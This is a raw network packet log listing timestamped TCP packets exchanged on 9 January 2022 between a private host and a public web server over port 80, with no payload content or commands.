Jan 9, 2022 18:48:49.601536989 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.601552010 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.601573944 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.601610899 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.601629019 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.601650000 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.601686954 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.601700068 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.601726055 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.601773977 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.782694101 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.782752037 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.782789946 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.782809019 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.782829046 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.782869101 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.782876968 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.782907009 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.782944918 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.782957077 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.782983065 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783019066 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783031940 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.783057928 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783096075 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783109903 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.783134937 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783174038 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783184052 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.783210039 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783248901 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783262014 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.783287048 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783324003 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783337116 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.783363104 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783401012 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783410072 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.783440113 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783478022 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783493042 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.783514977 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783552885 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783566952 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.783591986 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783627987 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783643007 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.783665895 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783704042 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783716917 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.783742905 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783782959 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783797026 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.783818960 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783858061 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783871889 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.783896923 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783931971 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.783951044 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.783971071 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.784008980 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.784022093 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.784046888 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.784085989 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.784096003 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.784122944 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.784161091 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.784169912 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.784199953 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.784235954 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.784249067 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.784274101 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.784312010 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.784323931 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.784348965 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.784388065 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.784401894 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.784424067 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.784461975 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.784476042 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.784499884 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.784549952 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.965826035 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.965882063 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.965919971 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.965959072 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.965986013 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.965995073 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966016054 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.966036081 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966078043 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966084957 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.966114998 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966156006 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966166019 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.966195107 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966229916 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966243982 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.966269016 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966306925 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966320038 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.966346025 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966384888 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966399908 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.966420889 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966459036 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966473103 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.966497898 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966533899 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966547966 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.966573000 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966613054 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966623068 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.966671944 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966723919 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.966730118 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966773033 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966814041 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966825962 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.966856003 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966892958 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966907024 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.966943979 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.966998100 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.967003107 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967057943 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967107058 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.967108965 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967169046 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967216969 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.967217922 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967277050 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967327118 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.967333078 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967391014 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967451096 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967468023 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.967513084 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967569113 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967570066 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.967622995 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967675924 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.967684984 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967737913 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967792034 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.967798948 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967859983 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967904091 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967910051 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.967941999 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967981100 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.967994928 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.968018055 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968055964 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968071938 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.968095064 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968131065 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968143940 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.968168974 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968206882 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968219995 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.968245029 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968285084 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968293905 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.968322039 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968359947 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968372107 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.968398094 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968434095 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968447924 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.968473911 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968512058 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968524933 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.968549967 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968589067 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968602896 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.968625069 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968662977 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968672991 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.968702078 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968738079 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968750954 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.968775988 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968816996 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968826056 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.968888998 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.968940973 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.968950987 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969007969 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969044924 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969058990 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.969083071 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969120979 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969134092 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.969156981 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969196081 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969203949 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.969232082 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969269991 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969283104 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.969307899 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969345093 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969358921 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.969383001 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969420910 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969429970 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.969458103 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969496012 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969506025 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.969535112 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969573021 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969582081 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.969611883 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969646931 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969659090 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.969685078 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969722986 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969736099 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.969758034 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969798088 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969811916 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.969835043 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969872952 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969888926 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.969914913 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969949961 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.969965935 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.969989061 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.970026970 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.970040083 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.970062971 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.970099926 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.970113993 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.970138073 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.970175982 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.970190048 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:49.970213890 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:49.970263958 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.130582094 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151153088 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151201010 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151231050 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151261091 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151299953 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151338100 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151360989 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151376009 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151391983 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151397943 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151403904 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151417017 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151422977 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151453972 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151484966 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151494026 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151499033 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151531935 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151546955 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151568890 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151585102 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151608944 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151623011 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151647091 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151659966 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151685953 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151699066 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151725054 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151735067 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151762962 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151779890 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151806116 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151819944 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151844978 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151854992 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151881933 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151896000 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151921034 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151933908 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151958942 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.151976109 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.151998043 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.152014017 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.152038097 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.152051926 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.152075052 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.152087927 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.152112961 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.152122974 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.152152061 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.152165890 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.152206898 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.311615944 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.311681986 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.311728001 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.311739922 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.311772108 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.311778069 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.311789036 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.311849117 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.311855078 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.311901093 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.311908007 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.311959028 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.311970949 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312030077 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312081099 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312123060 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312134981 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312155962 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312175035 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312191963 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312215090 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312228918 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312252045 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312264919 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312289953 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312314034 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312329054 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312336922 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312366009 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312378883 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312403917 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312413931 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312443972 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312453032 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312483072 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312490940 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312522888 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312536955 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312560081 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312572956 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312597990 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312608004 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312638044 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312647104 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312674999 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312686920 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312712908 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312721014 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312748909 CET	80	49865	47.251.44.201	192.168.2.3
